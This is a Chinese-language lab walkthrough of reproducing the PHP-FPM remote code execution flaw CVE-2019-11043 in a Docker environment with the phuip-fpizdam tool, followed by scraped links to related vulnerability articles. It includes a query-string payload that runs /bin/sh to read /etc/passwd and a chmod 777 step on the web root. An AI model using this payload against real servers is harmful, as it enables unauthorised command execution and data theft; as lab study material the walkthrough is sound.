实战-PHP远程代码执行漏洞
环境搭建
搭建go语言环境
tar -C /usr/local -xzf go1.13.3.linux-amd64.tar.gz #解压go环境到常用命令的目录下
└─# echo “export PATH=$PATH:/usr/local/go/bin” > /etc/profile.d/go.sh 配置go.sh
└─# source /etc/profile.d/go.sh #运行go.sh
└─# go
下载使用漏洞的工具phuip-fpizdam:
修改goproxy代理地址,默认地址国内无法访问。
└─# go env -w GOPROXY=https://goproxy.cn
安装测试环境(Centos7)
安装docker服务使用docker镜像来运行LNMP(这里不做赘述)
导入镜像
[root@xuegod63 ~]# docker load -i reproduce-cve-2019-11043-image.tar
后台运行镜像,启动LNMP环境
[root@xuegod63 ~]# docker run --rm -d -p 8080:80 reproduce-cve-2019-11043
–rm:在运行结束之后就会删除
-d:后台运行
-p:端口映射
复现:
kali
编译一下:go build
成功之后:
运行
这句话就说了执行PHP代码执行的格式。
可以执行一个phpinfo的代码。
?a=/bin/sh±c+‘cat /etc/passwd’ &
先给镜像环镜/var/www/html 加上可执行权限 chmod 777 /var/www/html
在写入新的文件,打开写入文件(phpinfo.php)。
实战-PHP远程代码执行漏洞相关推荐
- thinkphp5+远程代码执行_ThinkPHP5 5.0.23 远程代码执行漏洞
漏洞描述 ThinkPHP是一款运用极广的PHP开发框架.其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程 ...
- 突发,Log4j2 爆出远程代码执行漏洞,各大厂纷纷中招!
今日推荐 这 9 个 Java 开源项目 yyds,你知道几个?阿里技术专家推荐的20本书,免费送!K8S 部署 SpringBoot 项目(一篇够用)妙用Java 8中的 Function接口 消灭 ...
- [系统安全] 十.Windows漏洞利用之SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- Windows DNS Server 远程代码执行漏洞 (CVE-2021-24078) 的详细原理分析
聚焦源代码安全,网罗国内外最新资讯! 漏洞简介 Windows DNS Server 是 Windows Server 服务器上的一项重要功能组件, 负责调度和处理域内主机的所有DNS相关服务. 奇 ...
- 漏洞通告 | Atlassian Confluence存在远程代码执行漏洞,悬镜云鲨RASP天然免疫防护...
近日,Atlassian官方发布了一则安全更新,通告了一个严重且已在野利用的远程代码执行漏洞CVE-2022-26134,攻击者利用该漏洞,无需任何条件即可在Confluence中执行任意命令. 该漏 ...
- php post 漏洞_ThinkPHP5 5.0.23 远程代码执行漏洞
作者介绍:Ice 国科学院安全学员,在国科学习安全课程,也参与在国科学生会安全团队中进行安全实战能力的提升.本次分享主要是针对现在一款运用极广的开发框架ThinkPHP的远程代码执行漏洞研究,希望给大 ...
- Struts2被曝远程代码执行漏洞;叮咚买菜抢菜工具;find替代方案…|叨资讯
点击关注强哥,还有100多G的面试资料等你来拿 哈喽,大家好,我是强哥. Struts2被曝远程代码执行漏洞:Facebook开源文本编辑器库Lexical:PyCharm 2022.1 正式发布:一 ...
- ElasticSearch Groovy脚本远程代码执行漏洞
什么是ElasticSearch? 它是一种分布式的.实时性的.由JAVA开发的搜索和分析引擎. 2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由 ...
最新文章
- windows git安装到把项目推送到github
- 【计算理论】计算理论总结 ( 正则表达式转为非确定性有限自动机 NFA | 示例 ) ★★
- 测试的时候数据库外键导致死锁_Oracle外键不加索引会引起死锁问题
- 程序猿段子_【新年新气象】今年,能为程序员男友做点什么?
- [ZJOI2010]网络扩容[网络流24题]
- php 经典的算法,PHP各种经典算法
- java编写一个邮件程序显示收件箱中所有的邮件列表_如何使用JavaMail获取邮件帐户中的可用文件夹列表...
- 程序员修神之路:问世间异步为何物?
- html相册魔方代码,魔方相册制作方法现成的魔方相册代码:
- html网页设计课程的思维导图,html思维导图
- [la P4487] Exclusive-OR
- 【数据集链接已添加】注塑成型工艺的虚拟量测和调机优化_第四届工业大数据竞赛题目发布
- 千寻位置平台使用入门总结
- html自动跳转加微信好友,底部固定div并跳转复制微信号添加好友
- 群晖218J安装mysql_群晖218j和218+选择哪个?
- 使用jira管理Scrum敏捷项目实战(四)jira自定义电子看板、敏捷看板、KANBAN配置
- resure挽救笔记本系统和一些相关的操作记录
- 查oracle的tps,Oracle TPS指标
- Learning Lightroom CC 学习Lightroom CC Lynda课程中文字幕
- 如何利用布林带构建量化交易策略?
热门文章
- python 数字+.的含义
- 从C#到Python——谈谈我学习Python一周来的体会
- 视频转gif怎么用手机操作?手机端gif动画制作的方法
- 牛客网-华为机试练习题 16 购物单
- 关于校外访问西安电子科技大学校内图书馆资源和教务系统等的方法总结
- android的多渠道打包,Android美团多渠道打包Walle集成
- 圣诞节的那些事(链接标签+路径)
- linux 时区设置 美国西部,美国西部太平洋时区是几区?
- mysql sphinx 中文搜索_MySQL中文全文搜索用迅搜还是Sphinx?
- 小米4c手机显示无服务器,小米4C卡机怎么办 小米4C卡机解决办法【图文】